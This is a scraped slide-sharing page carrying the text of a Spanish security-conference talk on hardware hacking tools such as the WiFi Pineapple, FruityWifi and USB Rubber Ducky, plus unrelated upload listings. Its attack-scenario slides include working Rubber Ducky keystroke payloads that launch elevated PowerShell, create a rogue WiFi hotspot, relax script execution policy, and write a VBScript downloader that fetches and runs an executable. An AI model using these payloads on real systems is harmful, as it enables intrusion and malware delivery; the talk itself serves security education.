Como tener una contraseña seguraComo tener una contraseña segura
Como tener una contraseña segura
 
Complementando el contro parental III
Complementando  el contro parental IIIComplementando  el contro parental III
Complementando el contro parental III
 
Complementando El control parental II de III
Complementando El control parental II de IIIComplementando El control parental II de III
Complementando El control parental II de III
 
Complementando el control parental I de III
Complementando el control parental I de IIIComplementando el control parental I de III
Complementando el control parental I de III
 
El control parental en Windows 7
El control parental en Windows 7El control parental en Windows 7
El control parental en Windows 7
 

Kürzlich hochgeladen

Nomisam: Base de Datos para Gestión de Nómina
Nomisam: Base de Datos para Gestión de NóminaNomisam: Base de Datos para Gestión de Nómina
Nomisam: Base de Datos para Gestión de Nóminacuellosameidy
 
La electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdfLa electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdfcristianrb0324
 
CommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersCommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersIván López Martín
 
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptxHugoGutierrez99
 
PROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y masPROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y maslida630411
 
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guiaORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guiaYeimys Ch
 
Slideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan GerenciaSlideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan Gerenciacubillannoly
 
Trabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power PointTrabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power PointValerioIvanDePazLoja
 
Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024
Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024
Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024u20211198540
 
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docxPLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docxhasbleidit
 
_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdf
_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdf_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdf
_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdfBetianaJuarez1
 
Trabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfTrabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfedepmariaperez
 
Clasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptxClasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptxCarolina Bujaico
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfjeondanny1997
 
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxModelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxtjcesar1
 
Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1ivanapaterninar
 
Herramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdfHerramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdfKarinaCambero3
 
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúRed Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúCEFERINO DELGADO FLORES
 
Actividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolarActividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolar24roberto21
 

Kürzlich hochgeladen (20)

Nomisam: Base de Datos para Gestión de Nómina
Nomisam: Base de Datos para Gestión de NóminaNomisam: Base de Datos para Gestión de Nómina
Nomisam: Base de Datos para Gestión de Nómina
 
La electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdfLa electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdf
 
El camino a convertirse en Microsoft MVP
El camino a convertirse en Microsoft MVPEl camino a convertirse en Microsoft MVP
El camino a convertirse en Microsoft MVP
 
CommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersCommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 Testcontainers
 
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
 
PROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y masPROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y mas
 
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guiaORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
 
Slideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan GerenciaSlideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan Gerencia
 
Trabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power PointTrabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power Point
 
Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024
Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024
Inteligencia Artificial. Matheo Hernandez Serrano USCO 2024
 
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docxPLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
 
_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdf
_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdf_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdf
_Planificacion Anual NTICX 2024.SEC.21.4.1.docx.pdf
 
Trabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfTrabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdf
 
Clasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptxClasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptx
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
 
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptxModelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
Modelo de Presentacion Feria Robotica Educativa 2024 - Versión3.pptx
 
Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1
 
Herramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdfHerramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdf
 
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del PerúRed Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
Red Dorsal Nacional de Fibra Óptica y Redes Regionales del Perú
 
Actividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolarActividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolar
 

T3ch fest leganes_final

  • 1. Jaime Álvarez y Roberto García Hardware Hacking Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/
  • 2. 2
  • 3. 3 ¿Quiene$ $omo$? Jaime Álvarez: • Es un apasionado del mundo de la Informática, siempre ha estado muy relacionado con la Seguridad Informática y la Calidad del Software. • Ha trabajado durante muchos años en el departamento de Calidad del Software y Administración de Sistemas en empresas estatales y privadas . • Es componente de Bugtraq- Team, un proyecto que está dedicándose a la implantación de un Sistema Operativo orientado a la Seguridad Informática. • Ha impartido talleres sobre hardware hacking en diversas conferencias. Roberto García: • Es consultor de seguridad en InnotecSystem. Cuenta con más de 10 años de experiencia como Administrador de sistemas Windows, trabajando para empresas multinacionales líderes del sector. Es MCSA de Microsoft 2012 Server. • Es autor del blog 1gbdeinformacion, ganador del premio “Héroe Digital” de ESET en 2013 y finalista en 2014.
  • 4. Hardware Hacking –Piñas, Alfas y demás… Leganés 12-13 Febrero 2015 4
  • 5. Hardware Hacking ¿¡ Por que este taller !? “Estamos acostumbrados a usar los medios (...) como algo comunitario sin tener en cuenta los peligros existentes... no solo descuidando nuestra privacidad y seguridad, si no también nuestras obligaciones respecto a estas...”
  • 6. Hardware Hacking ¿Que es el Hardware Hacking? ● Herramientas que se basan en hardware para facilitar el trabajo en un “escenario” tanto ofensivo como defensivo. ● Las herramientas se sustentan por un firmware y/o un software interno o externo. ● Suelen ser herramientas multidisciplinares. ● Hardware y software pre-configurado y de fácil uso. ● Interfaces muy intuitivas. ● Normalmente portables y/o autónomas.
  • 7. Throwing Star LAN Tap ● Hardware Hacking puro (no requiere de software) ● Pasivo (No alimentado) ● Monitoriza BASE10-T, 100BASE-T y RS- 232 DB9 (puerto serie) ● Puede monitorizar 1000BASE-T (renegociando la velocidad) ● Dos condensadores pF 220 para hacer el bypass del par extra que requiere el 1000BASE-T ● Los puertos J3 y J4 son solo receptores ● Dos jacks RJ45 para la red monitorizada (I/O) ● Dos jacks RJ45 independientes para la monitorización ( J1-J3 / J2-J4)
  • 8. WIRELESS HARDWARE HACKING Firmware utilizado: ● OpenWRT o DD-WRT (uso comercial) ● Modificaciones de OpenWRT ¿Por que OpenWRT? ● Costes / Licencia GPLv2 ● Ultralijero y compacto. ● Firmware adaptable (+3500 paquetes de software) ● Diseñado para sistemas embebidos
  • 9. Beini WIFIROBIN 2 Especificaciones Técnicas: ● Chipset Atheros AR9331 400Mhz ● 1x IEEE 802.11b/g/n ● 2x Ethernet 100BASE-T ● 1x USB (multi-disciplinar) ● Software OpenWRT (Beini) ● Alimentación Externa 5V/2A ● Antena alta ganancia (5dB) PR-SMA ● Soporta WEP, WPA y WPA2 ● Función de Router, Punto de Acceso, modo repetidor. ● Cracking WEP y WPA
  • 10. Beini WIFIROBIN 2 Características técnicas: ● Router ● Punto de Acceso (AP) ● Repetidor ● Recuperación claves WEP y WAP La recuperación de claves WEP se hace mediante la suite aircrack con inyección de paquetes. Sin embargo de las claves WAP se hace necesario un diccionario que podemos ampliar por USB ya que se realiza mediante ataque de Fuerza Bruta.
  • 11. PINEAPPLE MARK IV Especificaciones: ● OpenWRT modificado ● Chip: 400 MHz MIPS Atheros AR9331 (IEEE) 802.11 b/g/n) 8Mb RAM / 32Mb ROM ● 1x USB ● 2x 100BASE-T Ethernet (LAN / WAN) ● 1X botón “WPS” configurable a 5 acciones distintas (según pulsaciones) ● Ya no tiene soporte oficial
  • 13. ALFA NETWORK AP121U / HORNET-UB ● La tarjeta ALFA AP121U se basa en la placa HORNET-UB (existen 2 modelos) ● Modelo con Memoria Flash 8M/32M ● U-BOOT (bootloader) ● Soporta OpenWRT ● Modulo conversor USB 2.0 a TTL UART 6PIN CP2102 ● Flash Firmware a Pineapple Mark IV
  • 14. PINEAPPLE MARK IV WiFi Pineapple Mark IV es un dispositivo que permite realizar ataques man-in-the-middle, Karma, DNS Spoofing, SSLstrip, desautentification, tcpdump, incluso ataques de Phishing. La versatilidad se encuentra en la posibilidad de adaptar nuestro dispositivo mediante infusiones. Las Infusiones son “añadidos” que podremos programar nosotros mismos o descargados del Pineapple Bar. La infusiones mas conocida de este dispositivo son KARMA y SSLstrip.
  • 16. PINEAPPLE MARK IV KARMA es un set de herramientas para la evaluación de clientes inalámbricos en distintas capas. Las herramientas de descubrimiento a través de Wireless sniffing, captan los clientes cercanos y sus redes preferidas mediante la escucha pasiva de paquetes Probe Request.
  • 17. POC MARK IV / KARMA
  • 18. RASPBERRY PI (FruityWifi) FRUITYWIFI ● Desarrollador: xtr4nge ● RaspDebian con Pwnpi ● https://github.com/xtr4nge/FruityWifi/ RASPBERRY B / B+ ● ARM 700 MHz (ARM11) ● 512 MiB (compartidos con la GPU) ● HDMI ● RCA / HDMI / DSI ● 3,5mm Audio Jack ● 8 x GPIO, SPI, I²C, UART ● 5v microUSB ● 2 / 4 USB 2.0
  • 19. FruityWifi FruityWifi : es una herramienta de código abierto para auditoria de redes wireless. Permite desplegar rápida y fácilmente ataques avanzados utilizando la interfaz web o enviándole mensajes. Inicialmente la aplicacion fue creada para utilizarse con una Raspberry-Pi, pero puede ser instalada en cualquier sistema basado en Debian. FruityWifi : se compone de módulos para darle más flexibilidad. Algunos de los modulos disponibles son URLsnarf, DNSspoof, Kismet, mdk3, ngrep, nmap, Squid3 y SSLstrip (con funcionalidades para inyectar código), Captive Portal, AutoSSH, Meterpreter, Tcpdump, etc... NOVEDAD : FruityWifi v2.0 trae muchas novedades. Una nueva interfaz, nuevos módulos, soporte para chipsets Realtek, soporte para Mobile Broadband (3G/4G), un nuevo panel de configuración, y más.
  • 20. FruityWifi 2.0 Gui / Modulos
  • 22. POC MARK IV / sslstrip
  • 23. POC MARK IV / Phishing
  • 24. 24 PINEAPPLE MARK V En Noviembre de 2013 se sacó un nuevo hardware más avanzado con dos antenas de red como se ha visto. La GUI del sistema se ha renovado completamente y está en continua evolución debido a que es el sistema mas actual y está bajo soporte. Debido al puerto de expansión se espera que este modelo sea mas duradero y ya han salido nuevos gadgets, como puede ser una caja para contener dos Mark V conectadas en red, una placa de expansión para controladores externos o cajas de ocultación parecidas a “la alarma de mi casa”.
  • 25. PINEAPPLE MARK V ● 1x IEEE 802.11b/g/n Radio, AR9331 ● 1x IEEE 802.11a/b/g Radio, RTL8187 ● Procesador MIPS a400Mhz ● Memoria 64MB DDR2 ● Memoria flash 16MB ● 1x USB 2.0 ● 1x 100BASE-T Ethernet. ● Ranura Micro-SD ● Modos de arranque mediante Switches ● Indicadores LED ● Puerto de Expansión ● Serial TTL ● OpenWRT modificado y FailSave
  • 28. MARK V / poc - PINEAPP
  • 29. MARK V / poc - ccupineapple
  • 30. MARK V / poc - Evilportal
  • 31. MARK V / POC - ADS-B tracker
  • 32. USB RUBBER DUCKY Especificaciones: ● 60Mhz 32-bit CPU ● Botón de repetición ● Indicador LED ● 1X USB Tipo A 2.0 ● Puerto Micro-SD (128Mb) ● Carcasa de ocultación
  • 33. USB RUBBER DUCKY Características técnicas: ● Soporta Multi HID (12 idiomas) ● Firmware amoldable ● Encoder Multiplataforma ● Soportado para Windows / Unix / OSX / Android / IOS ● Encoder con soporte de múltiples comandos (Alt+Contol+Supr) ● VID & PID manipulables
  • 34. USB RUBBER DUCKY DESGLOSE DE COMANDOS del Encoder: ● DELAY x- Espera x milisegundos ● STRING xxx – Escribe xxx ● GUI – Tecla Windows ● GUI R – Windows + R (ejecutar) ● Command – Tecla de comando OSX ● ENTER – Intro ● SPACE – Espacio ● REPEAT x – Repite comando anterior x veces ● CAPS |CAPSLOCK – Bloqueo Mayúsculas ● UP | UPARROW – Tecla arriba ● DOWN | DOWNARROW – Tecla abajo ● LEFT | LEFTARROW – Tecla izquierda ● RIGHT | RIGHTARROW – Tecla derecha ● SHIFT – Shift ● DEL – Borrar ● CONTROL – Control
  • 35. USB RUBBER DUCKY OTRO FIRMWARE DISPONIBLE: ● duck.hex (Duck(Original)) ● usb.hex (FAT Duck) ● m_duck.hex (Detour Duck (formerly Naked Duck)) ● c_duck.hex (Twin Duck) ● cm_duck.hex alpha(unamed)
  • 36. PoC Rubber DUCKY: UBUNTU 14.04
  • 39. Seguridad PERIMETRAL  No se establece una política de actualizaciones.  No se establece una política de configuraciones en el router.  No se realiza “hardering” sobre la red local, servidores, ni equipos de trabajo.  Ni que pensar del “Bring your own device”
  • 40. ES HORA DE VOLVERSE EL MALO ;-P
  • 44. POC ATAQUE 1 (EL PLATO)
  • 45. POC ATAQUE 1 (RECETA) Material necesario:  1 Drone  1 Piña o más... (añadir mas piñas para ocultar “el sabor”)  1 PC  Antenas lo suficientemente potentes.
  • 46. POC ATAQUE 2 (Preparando la piña) INFUSIONES y MeDIOS:  Infusión WPS  Modo cliente  PC Objetivo:  Posicionar y controlar nuestra piña lo mas cerca del router de la empresa.  Aprovechar una mala configuración para conectarnos como usuarios legítimos en la red.
  • 47. POC ATAQUE 1 (COCINANDO)  Piña1 Wlan0 ataca wps  Piña2 Wlan1 conecta modo cliente con Piña1 Wlan0-1 para control (red protegida WPA2 SSL)  Piña2 Wlan0-1 o Piña2 Ethernet quedan libres para control de Piña2 desde nuestro PC y de ahí tendremos acceso a Piña1 Wlan0-1  Una vez finalizado el ataque WPS de Piña1 conectamos Piña1 Wlan1 en modo cliente con WlanVictima dandonos acceso a Piña1 desde Piña1 Wlan0-1 a traves de Piña2 Wlan1 y Piña2 Wlan0-1 a su vez desde el PC.
  • 48. POC Ataque 1 (RESULTADO)
  • 49. POC ATAQUE 2 (PLAN B)
  • 50. POC PLAN B PATO 1 DELAY 750 GUI m GUI r DELAY 500 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 500 ALT s DELAY 500 ENTER STRING netsh wlan set hostednetwork ssid=SSIDFALSO key=Clave+Falsa ENTER STRING netsh wlan start hostednetwork ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL G DELAY 500 STRING C:Windowsconfig-25381.ps1 ENTER DELAY 500 ALT F4 DELAY 500 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT s DELAY 500 STRING mode con:cols=14 lines=1 ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File C:Windowsconfig.ps1 GUI l ENTER
  • 51. POC PLAN B PATO 2 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs <METEMOS LA URL AQUI> ENTER STRING <METEMOS EL ARCHIVO .EXE AQUI> ENTER STRING exit ENTER
  • 52. POC ATAQUE 3 (PLAN C) Usando el ambientador...
  • 53. POC ATAQUE 3 (PLAN C) Ocultando el Olor Foto de David de Roman
  • 55. Para aladdin gurbanov Persona, hacker y compañero.
  • 56. MUCHAS GRACIAS! Jaime Álvarez de Aldecoa Twitter: @KioArdetroya E-mail: jaime.alvarezdealdecoa@gmail.com Roberto García Amoriz Twitter: @1GbDeInfo E-mail: 1gbdeinformacion@rogaramo.com Blog: www.1gbdeinformacion.com